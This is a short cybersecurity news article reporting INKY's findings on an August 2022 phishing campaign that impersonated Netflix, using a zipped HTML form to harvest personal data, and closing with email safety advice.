Leveraging Netflix for credential harvesting.
N2K logoSep 21, 2022

INKY has discovered a threat actor targeting Netflix customers in a credential-harvesting campaign.

Leveraging Netflix for credential harvesting.

INKY this morning blogged about a phishing scheme that impersonates Netflix. Researchers report that between August 21 and August 27 of this year, Netflix customers were the target of a personal identifiable information (PII) data harvesting campaign. The campaign used a malicious HTML attachment compressed in a zip file.

Social engineers show more linguistic savvy.

The campaign is noteworthy because it shows that criminal social engineering is being conducted with greater polish, without some of the clumsy diction and non-standard language that once made it easy to spot. As INKY puts it, "There was a time when brand fraud attempts were easier to catch because they contained many tell-tale signs of phishing. Multiple typos, strange word choices, suspicious URLs, and odd-looking logos provided insight to the recipients of these malicious emails. But times have changed. Cybercrime gets more sophisticated every year, with no signs of stopping. Today, many tell-tale signs of a brand impersonation are so cleverly hidden that even the most discerning eye can’t recognize them. That certainly is the case with the most recent Fresh Phish to swim into INKY’s nets."

Brand spoofing and a familiar attack sequence.

The phishing emails targeted Netflix customers, and were spoofed to look as if they came from Netflix’s actual domain. The emails originated from a virtual private server in Germany, and then moved to an abused mail server from a Peruvian university, which allowed the email to receive a DKIM pass and make it to the recipient. 

The scam itself had a familiar style. Recipients of the email were told that they needed to update their billing information for Netflix by downloading a form attached to the email. The attached “form” is a zip file containing an HTML attachment asking for PII on the recipient’s device. After the receiver fills in their information, there is a button at the bottom that says “Agree and Continue.” And of course when they agree and continue, their PII gets sent to the threat actor.

Some email best practices.

INKY reminds users of best practices when it comes to unidentified emails. They advise being cautious of zip file attachments, since there is no ability to preview them, visiting a company’s website directly to resolve an account issue, and using the browser’s address bar to hover over links and determine that you’re on a website instead of a local file. They also note that SMTP servers should be set up so that they don’t accept and forward emails from non-local IP addresses to non-local mailboxes.